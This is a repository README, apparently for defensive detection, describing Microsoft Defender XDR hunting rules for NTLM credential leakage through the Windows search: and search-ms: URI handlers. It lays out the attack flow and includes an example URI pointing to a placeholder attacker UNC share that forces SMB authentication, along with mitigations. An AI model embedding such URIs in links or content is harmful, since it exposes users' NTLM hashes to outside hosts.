eliza-commit5/Unpatched-NTLM-Leakage-in-Windows-search-URI-Handler

# Windows 搜索 URI 处理程序中未修补的 NTLM 泄漏 针对 Windows 搜索 URI 处理程序中相关 NTLM 泄漏原语的主动威胁狩猎 2026/4/6 Microsoft Defender XDR 检测包：搜索 URI NTLM 凭据泄漏 概述 此仓库包含 Microsoft Defender XDR Advanced Hunting 查询和自定义检测规则，旨在识别滥用 Windows `search:` 和 `search-ms:` URI 处理程序进行 NTLM 凭据泄漏的行为。 开发此检测内容是为了应对公开披露的研究，这些研究表明，Windows 搜索 URI 处理程序可能会被滥用，通过 `crumb=location:` 参数提供的精心构造的 UNC 路径，触发向攻击者控制的系统发起出站 SMB 身份验证。 成功的攻击可能会暴露用户的 Net-NTLMv2 哈希，而无需恶意软件、权限提升或文件下载。 威胁摘要 攻击流程 ``` 1. User clicks a malicious link containing a search: or search-ms: URI. 2. Windows Explorer processes the URI through the SearchExecute COM handler. 3. The URI references a remote UNC path using crumb=location:\\attacker\share. 4. Windows automatically attempts SMB authentication. 5. The attacker captures the victim's Net-NTLMv2 challenge-response. ``` 示例： search:query=test&crumb=location:\\attacker\share MITRE ATT&CK 映射 技术 描述 T1187 强制身份验证 T1557 中间人攻击 T1110.002 密码破解 T1021.002 SMB/Windows 管理共享 推荐的 Defender 配置 自定义检测设置 设置 建议 1. 频率 每 5 分钟 2. 回溯 1-2 小时 3. 严重性 高 自动调查 已启用 事件创建 已启用 建议的缓解措施 阻止出站 SMB 防止工作站发起出站 SMB 连接： TCP/445 TCP/139 除非有明确要求。 强制执行 SMB 签名 减少 NTLM 中继攻击的机会。 限制 NTLM 使用 审查并逐步实施： RestrictSendingNTLMTraffic = 2 建议在强制执行前使用审计模式。 检测理念 此仓库专注于行为检测，而不是基于 CVE 的检测。 多个公开记录的 Windows URI 处理程序表现出类似的 NTLM 泄漏行为。防御者应检测底层技术，而不是仅仅依赖漏洞标识符或供应商提供服务的 CVE。 目标是识别： ``` • Forced authentication attempts • Unexpected SMB authentication • URI-handler abuse • NTLM credential exposure activity ``` 而不考虑所涉及的特定 Windows 组件。 免责声明 此仓库仅用于防御性安全、威胁狩猎、检测工程和事件响应目的。 在部署到生产环境之前，请务必在测试环境中验证检测结果。

标签：Microsoft Defender XDR, NTLM凭证泄露, 漏洞检测规则, 高级狩猎查询